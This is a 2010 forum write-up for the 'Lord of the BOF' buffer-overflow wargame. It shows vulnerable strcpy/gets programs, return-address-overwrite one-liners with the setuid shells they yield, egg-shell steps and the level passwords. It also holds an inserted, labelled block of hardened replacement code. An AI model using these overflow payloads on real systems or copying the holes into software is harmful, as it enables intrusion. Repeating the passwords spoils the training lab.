http://www.hackerschool.org/HS_Boards/zboard.php?id=bof_fellowship&no=11
CodeAche
Lord Of the BOF
-Over The Gate-
/* 1. gcc 2.91, old stack layout
   2. \xff kept getting stored as 00, so
      in the ordinary egg shellcode source (the one that includes setuid), the last
      system("/bin/bash") was changed to bash2 before running
*/
[GATE]
---------gremlin.c----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];            /* 256-byte stack buffer */
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);     /* unbounded copy: an argv[1] longer than 256 bytes overwrites sfp and ret */
    printf("%s\n", buffer);
    return 0;
}
----------------------------
buffer   sfp   ret
256      4     4
attack -> 260 bytes + shell_address
----------------------------
[gate@localhost gate]$ ./gremlin `perl -e 'print "x"x260,"\x58\xfb\xff\xbf"'`
bash$ id
uid=500(gate) gid=500(gate) euid=501(gremlin) egid=501(gremlin) groups=500(gate)
PASS : hackers proof
[Cobolt]
---------cobolt.c----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16];             /* 16-byte stack buffer */
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);     /* unbounded copy: an argv[1] longer than 16 bytes overwrites sfp and ret */
    printf("%s\n", buffer);
    return 0;
}
----------------------------
buffer[16]   sfp   ret
16           4     4
attack -> 16 bytes + 4 + shell_address
----------------------------
[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print "x"x20,"\x48\xfb\xff\xbf"'`
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
PASS : hacking exposed
[Goblin]
----------goblin.c---------
#include <stdio.h>

int main()
{
    char buffer[16];             /* 16-byte stack buffer */
    gets(buffer);                /* gets() has no length limit: a stdin line longer than 16 bytes overwrites sfp and ret */
    printf("%s\n", buffer);
    return 0;
}
--------------------------
Exactly the same problem as cobolt.
The only difference is whether the input arrives as an argument or through gets().
Therefore:
[cobolt@localhost cobolt]$ (python -c 'print "x"*20+"\x48\xfb\xff\xbf"';cat)|./goblin
id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
PASS : hackers proof
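All three programs above share one defect: an unbounded copy (strcpy() into a fixed buffer in gremlin/cobolt, gets() into a 16-byte buffer in goblin) that lets the sfp and ret slots be overwritten. The following is an added example, not part of CodeAche's post or of the LOB sources, showing the hardened forms a maintainer would substitute. The function names bounded_copy, bounded_getline and hardened_main are this example's own; the 16-byte buffer size mirrors cobolt/goblin.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hardened replacement for the strcpy() in gremlin.c / cobolt.c.
 * Copies at most dst_size-1 bytes and always NUL-terminates.
 * Returns 0 on success, -1 when src did not fit (dst holds a truncated copy). */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hardened replacement for the gets() in goblin.c: reads at most dst_size-1
 * bytes from stream, strips the trailing newline, and drains the rest of an
 * over-long line so its tail is not mistaken for the next input.
 * Returns the number of bytes stored, or -1 on EOF/error with nothing read. */
int bounded_getline(char *dst, size_t dst_size, FILE *stream)
{
    if (dst == NULL || dst_size == 0 || stream == NULL)
        return -1;
    if (fgets(dst, (int)dst_size, stream) == NULL) {
        dst[0] = '\0';
        return -1;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        /* No newline seen: the line was longer than the buffer; discard the remainder. */
        int c;
        while ((c = fgetc(stream)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Hardened gremlin/cobolt main (hypothetical name): identical output for
 * well-formed input, but an over-long argv[1] is rejected instead of
 * overwriting sfp/ret. Return codes: 0 ok, 1 missing argument, 2 input too long. */
int hardened_main(int argc, char *argv[])
{
    char buffer[16];                     /* same size as cobolt.c */
    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (bounded_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        return 2;
    }
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char *argv[])
{
    return hardened_main(argc, argv);
}
```

Rejecting the over-long argument outright (rather than silently truncating) is deliberate: a truncated copy still "works", which hides the fact that something pushed more data at the program than it was designed for, and that is the event worth logging on a setuid binary.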
-------------------------------------------------------------------------------------------
버퍼
//gate -> gremlin
mkdir buffer
cd buffer
vi egg.c
enter the eggshell source, then
gcc egg.c -o egg
./egg
cd ..
./gremlin $RET
my-pass
gremlin pass : hello bof world
//gremlin -> cobolt
mkdir buffer
cd buffer
vi egg.c
enter the eggshell source, then
gcc egg.c -o egg
./egg
cd ..
./cobolt $RET
my-pass
//gremlin -> goblin
bash2
vi egg.c
enter the eggshell source (change the system("/bin/bash"); at the very end to system("/bin/bash2");)
gcc egg.c -o egg
./egg
( printf $RET;cat)|./goblin
id
my-pass
This is how I solved it.
My memory is hazy, haha; I trust you'll forgive any misspellings..
-------------------------------------------------------------------------------------------
영빈
-- gremlin --
buf : ebp-256
egg : bffffd18
../gremlin `python -c 'print "A"*260 + "\x18\xfd\xff\xbf"'`
hello bof world
-- cobolt --
buf : ebp-16
egg : bffffcf8
../cobolt `python -c 'print "A"*20 + "\xf8\xfc\xff\xbf"'`
hacking exposed
-- goblin --
buf : ebp-16
egg : bffffd08
(python -c 'print "A"*20 + "\x08\xfd\xff\xbf"';cat) | ../goblin
hackers proof
I solved it like this~
This time I learned for the first time that a setuid binary can't be debugged because of its permissions...
Hit : 4069 Date : 2010/02/26 07:18